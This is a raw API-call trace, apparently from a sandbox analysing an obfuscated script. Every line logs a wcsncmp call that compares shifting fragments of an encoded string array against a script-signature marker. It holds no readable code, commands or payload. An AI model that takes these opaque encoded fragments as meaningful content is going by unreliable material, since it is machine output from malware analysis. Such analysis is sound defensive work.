	[0143.921] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.921] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0143.921] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0143.921] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.921] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0143.921] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.921] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.921] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.921] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.921] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.922] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.922] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.922] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0143.922] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0143.922] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.922] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.922] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.922] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0143.922] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.922] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0143.922] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.922] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.922] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.922] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.922] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0143.922] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.922] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0143.922] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0143.922] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0143.922] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.922] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.922] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.922] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.922] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.922] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.922] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.922] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0143.922] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.922] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0143.922] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.922] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.922] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0143.922] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.922] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.922] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.922] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0143.922] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.922] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0143.922] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0143.922] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.923] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0143.923] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0143.923] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.923] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0143.923] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0143.923] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.923] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.923] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.923] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0143.923] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.923] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.923] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0143.923] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0143.923] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0143.923] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0143.923] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0143.923] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.923] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0143.923] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0143.923] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.923] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0143.923] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.923] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.923] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.923] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.923] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.923] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0143.923] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0143.923] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0143.923] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.923] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0143.923] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.923] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.923] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0143.923] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.923] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.923] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0143.923] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0143.924] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0143.924] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.924] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.924] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.924] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.924] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0143.924] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.924] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0143.924] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0143.924] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.924] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.924] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0143.924] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0143.924] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0143.924] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0143.924] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.924] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.924] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0143.924] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.924] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.924] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.924] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.924] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0143.924] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0143.924] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.924] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0143.924] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.924] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.924] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.924] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0143.924] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0143.924] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.924] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0143.924] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0143.924] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.924] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.924] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0143.924] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0143.925] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.925] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0143.925] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0143.925] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.925] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.925] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.925] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0143.925] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0143.925] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.925] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.925] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.925] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0143.925] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0143.925] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.925] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0143.925] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.925] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.925] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0143.925] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0143.925] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0143.925] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0143.925] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0143.925] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0143.925] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0143.925] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.925] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0143.925] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.925] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0143.925] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0143.925] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.925] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0143.925] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0143.925] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.925] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0143.925] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0143.925] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.925] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0143.925] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0143.925] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0143.926] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0143.926] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0143.926] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0143.926] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0143.926] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0143.926] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0143.926] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0143.926] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0143.926] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0143.926] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
